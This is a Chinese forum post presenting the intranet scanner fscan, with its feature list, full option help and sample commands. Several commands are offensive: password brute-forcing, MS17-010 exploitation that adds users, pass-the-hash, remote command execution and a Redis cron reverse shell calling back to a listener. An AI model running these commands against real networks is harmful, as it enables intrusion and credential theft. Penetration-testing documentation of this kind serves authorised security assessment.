IT评测·应用市场-qidao123.com

标题: 内网漏扫工具fscan [打印本页]

作者: 温锦文欧普厨电及净水器总代理    时间: 2024-9-26 15:00
标题: 内网漏扫工具fscan
一、先容:
fscan是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划使命反弹shell、读取win网卡信息、web指纹辨认、web弊端扫描、netbios探测、域控辨认等功能。
二、主要功能
1.信息搜集:
存活探测(icmp)
端口扫描
2.爆破功能:
各类服务爆破(ssh、smb、rdp等)
数据库密码爆破(mysql、mssql、redis、psql、oracle等)
3.系统信息、弊端扫描:
netbios探测、域控辨认
获取目的网卡信息
高危弊端扫描(ms17010等)
4.Web探测功能:
webtitle探测
web指纹辨认(常见cms、oa框架等)
web弊端扫描(weblogic、st2等,支持xray的poc)
5.弊端使用:
redis写公钥或写计划使命
ssh命令执行
ms17017使用(植入shellcode),如添加用户等
6.其他功能:
文件生存 
三、安装
下载地址
https://github.com/shadow1ng/fscan/releases

 三、参数阐明
  1. Usage of fscan.exe:
  2.   -br int
  3.         Brute threads (default 1)
  4.   -c string
  5.         exec command (ssh|wmiexec)
  6.   -cookie string
  7.         set poc cookie,-cookie rememberMe=login
  8.   -debug int
  9.         every time to LogErr (default 60)
  10.   -dns
  11.         using dnslog poc
  12.   -domain string
  13.         smb domain
  14.   -full
  15.         poc full scan,as: shiro 100 key
  16.   -h string
  17.         IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12 | 192.168.1.0/24
  18.   -hash string
  19.         hash
  20.   -hf string
  21.         host file, -hf ip.txt
  22.   -hn string
  23.         the hosts no scan,as: -hn 192.168.1.1/24
  24.   -json
  25.         json output
  26.   -m string
  27.         Select scan type ,as: -m ssh (default "all")
  28.   -no
  29.         not to save output log
  30.   -nobr
  31.         not to Brute password
  32.   -nocolor
  33.         no color
  34.   -nopoc
  35.         not to scan web vul
  36.   -noredis
  37.         no redis sec test
  38.   -np
  39.         not to ping
  40.   -num int
  41.         poc rate (default 20)
  42.   -o string
  43.         Outputfile (default "result.txt")
  44.   -p string
  45.         Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
  46.   -pa string
  47.         add port base DefaultPorts,-pa 3389
  48.   -path string
  49.         fcgi、smb romote file path
  50.   -ping
  51.         using ping replace icmp
  52.   -pn string
  53.         the ports no scan,as: -pn 445
  54.   -pocname string
  55.         use the pocs these contain pocname, -pocname weblogic
  56.   -pocpath string
  57.         poc file path
  58.   -portf string
  59.         Port File
  60.   -proxy string
  61.         set poc proxy, -proxy http://127.0.0.1:8080
  62.   -pwd string
  63.         password
  64.   -pwda string
  65.         add a password base DefaultPasses,-pwda password
  66.   -pwdf string
  67.         password file
  68.   -rf string
  69.         redis file to write sshkey file (as: -rf id_rsa.pub)
  70.   -rs string
  71.         redis shell to write cron file (as: -rs 192.168.1.1:6666)
  72.   -sc string
  73.         ms17 shellcode,as -sc add
  74.   -silent
  75.         silent scan
  76.   -socks5 string
  77.         set socks5 proxy, will be used in tcp connection, timeout setting will not work
  78.   -sshkey string
  79.         sshkey file (id_rsa)
  80.   -t int
  81.         Thread nums (default 600)
  82.   -time int
  83.         Set timeout (default 3)
  84.   -top int
  85.         show live len top (default 10)
  86.   -u string
  87.         url
  88.   -uf string
  89.         urlfile
  90.   -user string
  91.         username
  92.   -usera string
  93.         add a user base DefaultUsers,-usera user
  94.   -userf string
  95.         username file
  96.   -wmi
  97.         start wmi
  98.   -wt int
  99.         Set web timeout (default 5)
复制代码
五、使用方法
简单用法
  1. fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
  2. fscan.exe -h 192.168.1.1/16  (B段扫描)
复制代码
其他用法
  1. fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
  2. fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
  3. fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
  4. fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
  5. fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
  6. fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
  7. fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
  8. fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
  9. fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
  10. fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
  11. fscan.exe -hf ip.txt  (以文件导入)
  12. fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
  13. fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
  14. fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
  15. fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
  16. fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
  17. fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
  18. fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
复制代码
六、举例阐明:
1.端口扫描:Fscan可以扫描目的主机上的TCP端口,发现开放的服务和弊端。
可以使用以下命令扫描目的主机的TCP端口:
  1. fscan.exe -h 域名、ip地址或者网段
复制代码
该命令将扫描域名、ip地址或者网段的全部TCP端口,并列出开放的端口和运行的服务。

2. 服务爆破
可以或许对服务进行爆破,可以使用内置的字典,也可以本身指定字典
查看可爆破的服务
  1. fscan.exe -h ip地址 -m -h  查看可爆破的服务,-m指定爆破类型
  2.    ___                              _
  3.   / _ \     ___  ___ _ __ __ _  ___| | __
  4. / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
  5. / /_\\_____\__ \ (__| | | (_| | (__|   <
  6. \____/     |___/\___|_|  \__,_|\___|_|\_\
  7.                      fscan version: 1.8.4
  8. The specified scan type does not exist
  9. -m
  10.    [ssh]
  11.    [findnet]
  12.    [netbios]
  13.    [ms17010]
  14.    [mssql]
  15.    [all]
  16.    [main]
  17.    [icmp]
  18.    [ftp]
  19.    [rdp]
  20.    [psql]
  21.    [fcgi]
  22.    [mem]
  23.    [webpoc]
  24.    [oracle]
  25.    [smb]
  26.    [redis]
  27.    [cve20200796]
  28.    [smb2]
  29.    [mysql]
  30.    [web]
  31.    [webonly]
  32.    [mgo]
  33.    [wmiexec]
  34.    [portscan]
复制代码
mysql爆破
如下,指定对某个主机的psql服务进行爆破
  1. fscan.exe -h ip -m psql        #使用默认的字典
  2. fscan.exe -h ip -m psql  -userf user.txt -pwdf passwd.txt      #使用指定的字典
复制代码

默认对全部服务爆破
如下,指定对多个主机默认全部服务进行爆破
  1. fscan.exe -h ip1,ip2 -m all  -userf user.txt -pwdf passwd.txt 
复制代码


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/) Powered by Discuz! X3.4